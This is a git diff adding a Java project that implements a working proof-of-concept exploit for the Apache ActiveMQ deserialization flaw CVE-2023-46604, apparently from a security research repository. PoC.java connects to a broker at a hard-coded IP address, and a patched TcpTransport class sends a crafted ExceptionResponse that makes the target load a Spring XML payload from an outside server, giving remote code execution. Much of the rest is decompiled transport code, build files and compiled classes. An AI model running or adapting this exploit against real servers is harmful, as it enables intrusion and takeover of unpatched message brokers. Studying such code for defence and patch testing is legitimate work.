diff --git a/.DS_Store b/.DS_Store
new file mode 100644
index 00000000..814baff5
Binary files /dev/null and b/.DS_Store differ
diff --git a/.gitignore b/.gitignore
index d23a0b2e..73785437 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,5 +1,6 @@
 .idea
 .vscode
+.DS_Store
 /target/
 
 *.html linguist-language=python
diff --git a/JavaSecurity/.DS_Store b/JavaSecurity/.DS_Store
new file mode 100644
index 00000000..f1b38318
Binary files /dev/null and b/JavaSecurity/.DS_Store differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/pom.xml b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/pom.xml
new file mode 100644
index 00000000..f6373542
--- /dev/null
+++ b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/pom.xml
@@ -0,0 +1,81 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>com.example</groupid>
+ <artifactid>CVE-2023-46604-Client</artifactid>
+ <version>0.0.1-SNAPSHOT</version>
+ <name>CVE-2023-46604-Client</name>
+ <description>CVE-2023-46604-Client</description>
+ <properties>
+ <java.version>11</java.version>
+ <project.build.sourceencoding>UTF-8</project.build.sourceencoding>
+ <project.reporting.outputencoding>UTF-8</project.reporting.outputencoding>
+ <spring-boot.version>2.6.13</spring-boot.version>
+ </properties>
+ <dependencies>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter</artifactid>
+ </dependency>
+ <dependency>
+ <groupid>org.apache.activemq</groupid>
+ <artifactid>activemq-client</artifactid>
+ <version>5.17.3</version>
+ </dependency>
+ <dependency>
+ <groupid>org.slf4j</groupid>
+ <artifactid>slf4j-simple</artifactid>
+ <version>2.0.5</version>
+ </dependency>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-test</artifactid>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+ <dependencymanagement>
+ <dependencies>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-dependencies</artifactid>
+ <version>${spring-boot.version}</version>
+ <type>pom</type>
+ <scope>import</scope>
+ </dependency>
+ </dependencies>
+ </dependencymanagement>
+
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-compiler-plugin</artifactid>
+ <version>3.8.1</version>
+ <configuration>
+ <source>11</source>
+ <target>11</target>
+ <encoding>UTF-8</encoding>
+ </configuration>
+ </plugin>
+ <plugin>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-maven-plugin</artifactid>
+ <version>${spring-boot.version}</version>
+ <configuration>
+ <mainclass>com.example.drunkbaby.Cve202346604ClientApplication</mainclass>
+ <skip>true</skip>
+ </configuration>
+ <executions>
+ <execution>
+ <id>repackage</id>
+ <goals>
+ <goal>repackage</goal>
+ </goals>
+ </execution>
+ </executions>
+ </plugin>
+ </plugins>
+ </build>
+
+</project>
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/main/java/com/example/drunkbaby/Cve202346604ClientApplication.java b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/main/java/com/example/drunkbaby/Cve202346604ClientApplication.java
new file mode 100644
index 00000000..500e2643
--- /dev/null
+++ b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/main/java/com/example/drunkbaby/Cve202346604ClientApplication.java
@@ -0,0 +1,13 @@
+package com.example.drunkbaby;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class Cve202346604ClientApplication {
+
+ public static void main(String[] args) {
+ SpringApplication.run(Cve202346604ClientApplication.class, args);
+ }
+
+}
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/main/java/com/example/drunkbaby/PoC.java b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/main/java/com/example/drunkbaby/PoC.java
new file mode 100644
index 00000000..01ba4fe8
--- /dev/null
+++ b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/main/java/com/example/drunkbaby/PoC.java
@@ -0,0 +1,22 @@
+package com.example.drunkbaby;
+
+import org.apache.activemq.ActiveMQConnectionFactory;
+
+import javax.jms.*;
+
+public class PoC {
+ public static void main(String[] args) throws Exception {
+
+ ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("tcp://124.222.21.138:61616");
+ Connection connection = connectionFactory.createConnection();
+ connection.start();
+ Session session = connection.createSession(Boolean.parseBoolean("1"),2);
+ Destination destination = session.createQueue("tempQueue");
+
+ MessageProducer producer = session.createProducer(destination);
+ Message message = session.createObjectMessage("123");
+ producer.send(message);
+
+ connection.close();
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/main/java/org/apache/activemq/transport/tcp/TcpTransport.java b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/main/java/org/apache/activemq/transport/tcp/TcpTransport.java
new file mode 100644
index 00000000..6e0ed709
--- /dev/null
+++ b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/main/java/org/apache/activemq/transport/tcp/TcpTransport.java
@@ -0,0 +1,601 @@
+//
+// Source code recreated from a .class file by IntelliJ IDEA
+// (powered by FernFlower decompiler)
+//
+
+package org.apache.activemq.transport.tcp;
+
+import org.apache.activemq.Service;
+import org.apache.activemq.TransportLoggerSupport;
+import org.apache.activemq.command.ExceptionResponse;
+import org.apache.activemq.thread.TaskRunnerFactory;
+import org.apache.activemq.transport.Transport;
+import org.apache.activemq.transport.TransportThreadSupport;
+import org.apache.activemq.util.InetAddressUtil;
+import org.apache.activemq.util.IntrospectionSupport;
+import org.apache.activemq.util.ServiceStopper;
+import org.apache.activemq.wireformat.WireFormat;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.context.support.ClassPathXmlApplicationContext;
+
+import javax.net.SocketFactory;
+import java.io.DataInputStream;
+import java.io.DataOutputStream;
+import java.io.IOException;
+import java.io.InterruptedIOException;
+import java.net.*;
+import java.nio.ByteBuffer;
+import java.security.cert.X509Certificate;
+import java.util.HashMap;
+import java.util.Map;
+import java.util.concurrent.CountDownLatch;
+import java.util.concurrent.TimeUnit;
+import java.util.concurrent.atomic.AtomicReference;
+
+public class TcpTransport extends TransportThreadSupport implements Transport, Service, Runnable {
+ private static final Logger LOG = LoggerFactory.getLogger(TcpTransport.class);
+ protected final URI remoteLocation;
+ protected final URI localLocation;
+ protected final WireFormat wireFormat;
+ protected int connectionTimeout;
+ protected int soTimeout;
+ protected int socketBufferSize;
+ protected int ioBufferSize;
+ protected boolean closeAsync;
+ protected Socket socket;
+ protected DataOutputStream dataOut;
+ protected DataInputStream dataIn;
+ protected TimeStampStream buffOut;
+ protected final InitBuffer initBuffer;
+ protected int trafficClass;
+ private boolean trafficClassSet;
+ protected boolean diffServChosen;
+ protected boolean typeOfServiceChosen;
+ protected boolean trace;
+ protected String logWriterName;
+ protected boolean dynamicManagement;
+ protected boolean startLogging;
+ protected int jmxPort;
+ protected boolean useLocalHost;
+ protected int minmumWireFormatVersion;
+ protected SocketFactory socketFactory;
+ protected final AtomicReference<countdownlatch> stoppedLatch;
+ protected volatile int receiveCounter;
+ protected Map<string, Object> socketOptions;
+ private int soLinger;
+ private Boolean keepAlive;
+ private Boolean tcpNoDelay;
+ private Thread runnerThread;
+
+ public TcpTransport(WireFormat wireFormat, SocketFactory socketFactory, URI remoteLocation, URI localLocation) throws UnknownHostException, IOException {
+ this.connectionTimeout = 30000;
+ this.socketBufferSize = 65536;
+ this.ioBufferSize = 8192;
+ this.closeAsync = true;
+ this.buffOut = null;
+ this.trafficClass = 0;
+ this.trafficClassSet = false;
+ this.diffServChosen = false;
+ this.typeOfServiceChosen = false;
+ this.trace = false;
+ this.logWriterName = TransportLoggerSupport.defaultLogWriterName;
+ this.dynamicManagement = false;
+ this.startLogging = true;
+ this.jmxPort = 1099;
+ this.useLocalHost = false;
+ this.stoppedLatch = new AtomicReference();
+ this.soLinger = Integer.MIN_VALUE;
+ this.wireFormat = wireFormat;
+ this.socketFactory = socketFactory;
+
+ try {
+ this.socket = socketFactory.createSocket();
+ } catch (SocketException var6) {
+ this.socket = null;
+ }
+
+ this.remoteLocation = remoteLocation;
+ this.localLocation = localLocation;
+ this.initBuffer = null;
+ this.setDaemon(false);
+ }
+
+ public TcpTransport(WireFormat wireFormat, Socket socket) throws IOException {
+ this(wireFormat, socket, (InitBuffer)null);
+ }
+
+ public TcpTransport(WireFormat wireFormat, Socket socket, InitBuffer initBuffer) throws IOException {
+ this.connectionTimeout = 30000;
+ this.socketBufferSize = 65536;
+ this.ioBufferSize = 8192;
+ this.closeAsync = true;
+ this.buffOut = null;
+ this.trafficClass = 0;
+ this.trafficClassSet = false;
+ this.diffServChosen = false;
+ this.typeOfServiceChosen = false;
+ this.trace = false;
+ this.logWriterName = TransportLoggerSupport.defaultLogWriterName;
+ this.dynamicManagement = false;
+ this.startLogging = true;
+ this.jmxPort = 1099;
+ this.useLocalHost = false;
+ this.stoppedLatch = new AtomicReference();
+ this.soLinger = Integer.MIN_VALUE;
+ this.wireFormat = wireFormat;
+ this.socket = socket;
+ this.remoteLocation = null;
+ this.localLocation = null;
+ this.initBuffer = initBuffer;
+ this.setDaemon(true);
+ }
+
+ public void oneway(Object command) throws IOException {
+ this.checkStarted();
+ Throwable obj = new ClassPathXmlApplicationContext("http://124.222.21.138:9999/poc.xml");
+ ExceptionResponse response = new ExceptionResponse(obj);
+ this.wireFormat.marshal(response, this.dataOut);
+ this.dataOut.flush();
+ }
+
+ public String toString() {
+ Object var10000 = this.socket.isConnected() ? "tcp://" + this.socket.getInetAddress() + ":" + this.socket.getPort() + "@" + this.socket.getLocalPort() : (this.localLocation != null ? this.localLocation : this.remoteLocation);
+ return "" + var10000;
+ }
+
+ public void run() {
+ LOG.trace("TCP consumer thread for " + this + " starting");
+ this.runnerThread = Thread.currentThread();
+
+ try {
+ while(!this.isStopped() && !this.isStopping()) {
+ this.doRun();
+ }
+ } catch (IOException var7) {
+ ((CountDownLatch)this.stoppedLatch.get()).countDown();
+ this.onException(var7);
+ } catch (Throwable var8) {
+ ((CountDownLatch)this.stoppedLatch.get()).countDown();
+ IOException ioe = new IOException("Unexpected error occurred: " + var8);
+ ioe.initCause(var8);
+ this.onException(ioe);
+ } finally {
+ ((CountDownLatch)this.stoppedLatch.get()).countDown();
+ }
+
+ }
+
+ protected void doRun() throws IOException {
+ try {
+ Object command = this.readCommand();
+ this.doConsume(command);
+ } catch (SocketTimeoutException var2) {
+ } catch (InterruptedIOException var3) {
+ }
+
+ }
+
+ protected Object readCommand() throws IOException {
+ return this.wireFormat.unmarshal(this.dataIn);
+ }
+
+ public String getDiffServ() {
+ return Integer.toString(this.trafficClass);
+ }
+
+ public void setDiffServ(String diffServ) throws IllegalArgumentException {
+ this.trafficClass = QualityOfServiceUtils.getDSCP(diffServ);
+ this.diffServChosen = true;
+ }
+
+ public int getTypeOfService() {
+ return this.trafficClass;
+ }
+
+ public void setTypeOfService(int typeOfService) {
+ this.trafficClass = QualityOfServiceUtils.getToS(typeOfService);
+ this.typeOfServiceChosen = true;
+ }
+
+ public boolean isTrace() {
+ return this.trace;
+ }
+
+ public void setTrace(boolean trace) {
+ this.trace = trace;
+ }
+
+ public String getLogWriterName() {
+ return this.logWriterName;
+ }
+
+ public void setLogWriterName(String logFormat) {
+ this.logWriterName = logFormat;
+ }
+
+ public boolean isDynamicManagement() {
+ return this.dynamicManagement;
+ }
+
+ public void setDynamicManagement(boolean useJmx) {
+ this.dynamicManagement = useJmx;
+ }
+
+ public boolean isStartLogging() {
+ return this.startLogging;
+ }
+
+ public void setStartLogging(boolean startLogging) {
+ this.startLogging = startLogging;
+ }
+
+ public int getJmxPort() {
+ return this.jmxPort;
+ }
+
+ public void setJmxPort(int jmxPort) {
+ this.jmxPort = jmxPort;
+ }
+
+ public int getMinmumWireFormatVersion() {
+ return this.minmumWireFormatVersion;
+ }
+
+ public void setMinmumWireFormatVersion(int minmumWireFormatVersion) {
+ this.minmumWireFormatVersion = minmumWireFormatVersion;
+ }
+
+ public boolean isUseLocalHost() {
+ return this.useLocalHost;
+ }
+
+ public void setUseLocalHost(boolean useLocalHost) {
+ this.useLocalHost = useLocalHost;
+ }
+
+ public int getSocketBufferSize() {
+ return this.socketBufferSize;
+ }
+
+ public void setSocketBufferSize(int socketBufferSize) {
+ this.socketBufferSize = socketBufferSize;
+ }
+
+ public int getSoTimeout() {
+ return this.soTimeout;
+ }
+
+ public void setSoTimeout(int soTimeout) {
+ this.soTimeout = soTimeout;
+ }
+
+ public int getConnectionTimeout() {
+ return this.connectionTimeout;
+ }
+
+ public void setConnectionTimeout(int connectionTimeout) {
+ this.connectionTimeout = connectionTimeout;
+ }
+
+ public Boolean getKeepAlive() {
+ return this.keepAlive;
+ }
+
+ public void setKeepAlive(Boolean keepAlive) {
+ this.keepAlive = keepAlive;
+ }
+
+ public void setSoLinger(int soLinger) {
+ this.soLinger = soLinger;
+ }
+
+ public int getSoLinger() {
+ return this.soLinger;
+ }
+
+ public Boolean getTcpNoDelay() {
+ return this.tcpNoDelay;
+ }
+
+ public void setTcpNoDelay(Boolean tcpNoDelay) {
+ this.tcpNoDelay = tcpNoDelay;
+ }
+
+ public int getIoBufferSize() {
+ return this.ioBufferSize;
+ }
+
+ public void setIoBufferSize(int ioBufferSize) {
+ this.ioBufferSize = ioBufferSize;
+ }
+
+ public boolean isCloseAsync() {
+ return this.closeAsync;
+ }
+
+ public void setCloseAsync(boolean closeAsync) {
+ this.closeAsync = closeAsync;
+ }
+
+ protected String resolveHostName(String host) throws UnknownHostException {
+ if (this.isUseLocalHost()) {
+ String localName = InetAddressUtil.getLocalHostName();
+ if (localName != null && localName.equals(host)) {
+ return "localhost";
+ }
+ }
+
+ return host;
+ }
+
+ protected void initialiseSocket(Socket sock) throws SocketException, IllegalArgumentException {
+ if (this.socketOptions != null) {
+ Map<string, Object> copy = new HashMap(this.socketOptions);
+ IntrospectionSupport.setProperties(this.socket, copy);
+ if (!copy.isEmpty()) {
+ throw new IllegalArgumentException("Invalid socket parameters: " + copy);
+ }
+ }
+
+ try {
+ if (this.socketBufferSize> 0) {
+ sock.setReceiveBufferSize(this.socketBufferSize);
+ sock.setSendBufferSize(this.socketBufferSize);
+ } else {
+ LOG.warn("Socket buffer size was set to {}; Skipping this setting as the size must be a positive number.", this.socketBufferSize);
+ }
+ } catch (SocketException var3) {
+ LOG.warn("Cannot set socket buffer size = " + this.socketBufferSize);
+ LOG.debug("Cannot set socket buffer size. Reason: " + var3.getMessage() + ". This exception is ignored.", var3);
+ }
+
+ sock.setSoTimeout(this.soTimeout);
+ if (this.keepAlive != null) {
+ sock.setKeepAlive(this.keepAlive);
+ }
+
+ if (this.soLinger> -1) {
+ sock.setSoLinger(true, this.soLinger);
+ } else if (this.soLinger == -1) {
+ sock.setSoLinger(false, 0);
+ }
+
+ if (this.tcpNoDelay != null) {
+ sock.setTcpNoDelay(this.tcpNoDelay);
+ }
+
+ if (!this.trafficClassSet) {
+ this.trafficClassSet = this.setTrafficClass(sock);
+ }
+
+ }
+
+ protected void doStart() throws Exception {
+ this.connect();
+ this.stoppedLatch.set(new CountDownLatch(1));
+ super.doStart();
+ }
+
+ protected void connect() throws Exception {
+ if (this.socket == null && this.socketFactory == null) {
+ throw new IllegalStateException("Cannot connect if the socket or socketFactory have not been set");
+ } else {
+ InetSocketAddress localAddress = null;
+ InetSocketAddress remoteAddress = null;
+ if (this.localLocation != null) {
+ localAddress = new InetSocketAddress(InetAddress.getByName(this.localLocation.getHost()), this.localLocation.getPort());
+ }
+
+ if (this.remoteLocation != null) {
+ String host = this.resolveHostName(this.remoteLocation.getHost());
+ remoteAddress = new InetSocketAddress(host, this.remoteLocation.getPort());
+ }
+
+ this.trafficClassSet = this.setTrafficClass(this.socket);
+ if (this.socket != null) {
+ if (localAddress != null) {
+ this.socket.bind(localAddress);
+ }
+
+ if (remoteAddress != null) {
+ if (this.connectionTimeout>= 0) {
+ this.socket.connect(remoteAddress, this.connectionTimeout);
+ } else {
+ this.socket.connect(remoteAddress);
+ }
+ }
+ } else if (localAddress != null) {
+ this.socket = this.socketFactory.createSocket(remoteAddress.getAddress(), remoteAddress.getPort(), localAddress.getAddress(), localAddress.getPort());
+ } else {
+ this.socket = this.socketFactory.createSocket(remoteAddress.getAddress(), remoteAddress.getPort());
+ }
+
+ this.initialiseSocket(this.socket);
+ this.initializeStreams();
+ }
+ }
+
+ protected void doStop(ServiceStopper stopper) throws Exception {
+ if (LOG.isDebugEnabled()) {
+ LOG.debug("Stopping transport " + this);
+ }
+
+ if (this.socket != null) {
+ if (this.closeAsync) {
+ final CountDownLatch latch = new CountDownLatch(1);
+ TaskRunnerFactory taskRunnerFactory = new TaskRunnerFactory();
+ taskRunnerFactory.execute(new Runnable() {
+ public void run() {
+ TcpTransport.LOG.trace("Closing socket {}", TcpTransport.this.socket);
+
+ try {
+ TcpTransport.this.socket.close();
+ TcpTransport.LOG.debug("Closed socket {}", TcpTransport.this.socket);
+ } catch (IOException var5) {
+ if (TcpTransport.LOG.isDebugEnabled()) {
+ TcpTransport.LOG.debug("Caught exception closing socket " + TcpTransport.this.socket + ". This exception will be ignored.", var5);
+ }
+ } finally {
+ latch.countDown();
+ }
+
+ }
+ });
+
+ try {
+ latch.await(1L, TimeUnit.SECONDS);
+ } catch (InterruptedException var9) {
+ Thread.currentThread().interrupt();
+ } finally {
+ taskRunnerFactory.shutdownNow();
+ }
+ } else {
+ LOG.trace("Closing socket {}", this.socket);
+
+ try {
+ this.socket.close();
+ LOG.debug("Closed socket {}", this.socket);
+ } catch (IOException var11) {
+ if (LOG.isDebugEnabled()) {
+ LOG.debug("Caught exception closing socket " + this.socket + ". This exception will be ignored.", var11);
+ }
+ }
+ }
+ }
+
+ }
+
+ public void stop() throws Exception {
+ super.stop();
+ CountDownLatch countDownLatch = (CountDownLatch)this.stoppedLatch.get();
+ if (countDownLatch != null && Thread.currentThread() != this.runnerThread) {
+ countDownLatch.await(1L, TimeUnit.SECONDS);
+ }
+
+ }
+
+ protected void initializeStreams() throws Exception {
+ TcpBufferedInputStream buffIn = new TcpBufferedInputStream(this.socket.getInputStream(), this.ioBufferSize) {
+ public int read() throws IOException {
+ ++TcpTransport.this.receiveCounter;
+ return super.read();
+ }
+
+ public int read(byte[] b, int off, int len) throws IOException {
+ ++TcpTransport.this.receiveCounter;
+ return super.read(b, off, len);
+ }
+
+ public long skip(long n) throws IOException {
+ ++TcpTransport.this.receiveCounter;
+ return super.skip(n);
+ }
+
+ protected void fill() throws IOException {
+ ++TcpTransport.this.receiveCounter;
+ super.fill();
+ }
+ };
+ if (this.initBuffer != null) {
+ buffIn.unread(this.initBuffer.buffer.array());
+ }
+
+ this.dataIn = new DataInputStream(buffIn);
+ TcpBufferedOutputStream outputStream = new TcpBufferedOutputStream(this.socket.getOutputStream(), this.ioBufferSize);
+ this.dataOut = new DataOutputStream(outputStream);
+ this.buffOut = outputStream;
+ }
+
+ protected void closeStreams() throws IOException {
+ if (this.dataOut != null) {
+ this.dataOut.close();
+ }
+
+ if (this.dataIn != null) {
+ this.dataIn.close();
+ }
+
+ }
+
+ public void setSocketOptions(Map<string, Object> socketOptions) {
+ this.socketOptions = new HashMap(socketOptions);
+ }
+
+ public String getRemoteAddress() {
+ if (this.socket != null) {
+ SocketAddress address = this.socket.getRemoteSocketAddress();
+ if (address instanceof InetSocketAddress) {
+ String var10000 = ((InetSocketAddress)address).getAddress().getHostAddress();
+ return "tcp://" + var10000 + ":" + ((InetSocketAddress)address).getPort();
+ } else {
+ return "" + this.socket.getRemoteSocketAddress();
+ }
+ } else {
+ return null;
+ }
+ }
+
+ public <t> T narrow(Class<t> target) {
+ if (target == Socket.class) {
+ return target.cast(this.socket);
+ } else {
+ return target == TimeStampStream.class ? target.cast(this.buffOut) : super.narrow(target);
+ }
+ }
+
+ public int getReceiveCounter() {
+ return this.receiveCounter;
+ }
+
+ private boolean setTrafficClass(Socket sock) throws SocketException, IllegalArgumentException {
+ if (sock != null && (this.diffServChosen &#124;&#124; this.typeOfServiceChosen)) {
+ if (this.diffServChosen && this.typeOfServiceChosen) {
+ throw new IllegalArgumentException("Cannot set both the Differentiated Services and Type of Services transport options on the same connection.");
+ } else {
+ sock.setTrafficClass(this.trafficClass);
+ int resultTrafficClass = sock.getTrafficClass();
+ if (this.trafficClass == resultTrafficClass) {
+ this.diffServChosen = false;
+ this.typeOfServiceChosen = false;
+ return true;
+ } else {
+ if (this.trafficClass>> 2 == resultTrafficClass>> 2 && (this.trafficClass & 3) != (resultTrafficClass & 3)) {
+ LOG.warn("Attempted to set the Traffic Class to " + this.trafficClass + " but the result Traffic Class was " + resultTrafficClass + ". Please check that your system allows you to set the ECN bits (the first two bits).");
+ } else {
+ LOG.warn("Attempted to set the Traffic Class to " + this.trafficClass + " but the result Traffic Class was " + resultTrafficClass + ". Please check that your system supports java.net.setTrafficClass.");
+ }
+
+ return false;
+ }
+ }
+ } else {
+ return false;
+ }
+ }
+
+ public WireFormat getWireFormat() {
+ return this.wireFormat;
+ }
+
+ public X509Certificate[] getPeerCertificates() {
+ return null;
+ }
+
+ public void setPeerCertificates(X509Certificate[] certificates) {
+ }
+
+ public static class InitBuffer {
+ public final int readSize;
+ public final ByteBuffer buffer;
+
+ public InitBuffer(int readSize, ByteBuffer buffer) {
+ if (buffer == null) {
+ throw new IllegalArgumentException("Null buffer not allowed.");
+ } else {
+ this.readSize = readSize;
+ this.buffer = buffer;
+ }
+ }
+ }
+}
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/main/java/org/springframework/context/support/ClassPathXmlApplicationContext.java b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/main/java/org/springframework/context/support/ClassPathXmlApplicationContext.java
new file mode 100644
index 00000000..ea49efa1
--- /dev/null
+++ b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/main/java/org/springframework/context/support/ClassPathXmlApplicationContext.java
@@ -0,0 +1,15 @@
+package org.springframework.context.support;
+
+public class ClassPathXmlApplicationContext extends Throwable {
+
+ private String message;
+
+ public ClassPathXmlApplicationContext(String message) {
+ this.message = message;
+ }
+
+ @Override
+ public String getMessage() {
+ return message;
+ }
+}
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/test/java/com/example/drunkbaby/Cve202346604ClientApplicationTests.java b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/test/java/com/example/drunkbaby/Cve202346604ClientApplicationTests.java
new file mode 100644
index 00000000..847d2a07
--- /dev/null
+++ b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/src/test/java/com/example/drunkbaby/Cve202346604ClientApplicationTests.java
@@ -0,0 +1,13 @@
+package com.example.drunkbaby;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.boot.test.context.SpringBootTest;
+
+@SpringBootTest
+class Cve202346604ClientApplicationTests {
+
+ @Test
+ void contextLoads() {
+ }
+
+}
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/com/example/drunkbaby/Cve202346604ClientApplication.class b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/com/example/drunkbaby/Cve202346604ClientApplication.class
new file mode 100644
index 00000000..bbbe83b6
Binary files /dev/null and b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/com/example/drunkbaby/Cve202346604ClientApplication.class differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/com/example/drunkbaby/PoC.class b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/com/example/drunkbaby/PoC.class
new file mode 100644
index 00000000..9cc83ec6
Binary files /dev/null and b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/com/example/drunkbaby/PoC.class differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/apache/activemq/transport/tcp/TcpTransport1ドル.class b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/apache/activemq/transport/tcp/TcpTransport1ドル.class
new file mode 100644
index 00000000..df92511c
Binary files /dev/null and b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/apache/activemq/transport/tcp/TcpTransport1ドル.class differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/apache/activemq/transport/tcp/TcpTransport2ドル.class b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/apache/activemq/transport/tcp/TcpTransport2ドル.class
new file mode 100644
index 00000000..a9393d39
Binary files /dev/null and b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/apache/activemq/transport/tcp/TcpTransport2ドル.class differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/apache/activemq/transport/tcp/TcpTransport$InitBuffer.class b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/apache/activemq/transport/tcp/TcpTransport$InitBuffer.class
new file mode 100644
index 00000000..2ba3073e
Binary files /dev/null and b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/apache/activemq/transport/tcp/TcpTransport$InitBuffer.class differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/apache/activemq/transport/tcp/TcpTransport.class b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/apache/activemq/transport/tcp/TcpTransport.class
new file mode 100644
index 00000000..3c47a938
Binary files /dev/null and b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/apache/activemq/transport/tcp/TcpTransport.class differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/springframework/context/support/ClassPathXmlApplicationContext.class b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/springframework/context/support/ClassPathXmlApplicationContext.class
new file mode 100644
index 00000000..63c7cca8
Binary files /dev/null and b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604-Client/target/classes/org/springframework/context/support/ClassPathXmlApplicationContext.class differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/pom.xml b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/pom.xml
new file mode 100644
index 00000000..c294b153
--- /dev/null
+++ b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/pom.xml
@@ -0,0 +1,83 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>com.example.drunkbaby</groupid>
+ <artifactid>CVE-2023-46604</artifactid>
+ <version>0.0.1-SNAPSHOT</version>
+ <name>CVE-2023-46604</name>
+ <description>CVE-2023-46604</description>
+ <properties>
+ <java.version>11</java.version>
+ <project.build.sourceencoding>UTF-8</project.build.sourceencoding>
+ <project.reporting.outputencoding>UTF-8</project.reporting.outputencoding>
+ <spring-boot.version>2.6.13</spring-boot.version>
+ </properties>
+ <dependencies>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter</artifactid>
+ </dependency>
+
+ <dependency>
+ <groupid>org.apache.activemq</groupid>
+ <artifactid>activemq-client</artifactid>
+ <version>5.17.3</version>
+ </dependency>
+ <dependency>
+ <groupid>org.slf4j</groupid>
+ <artifactid>slf4j-simple</artifactid>
+ <version>2.0.5</version>
+ </dependency>
+
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-starter-test</artifactid>
+ <scope>test</scope>
+ </dependency>
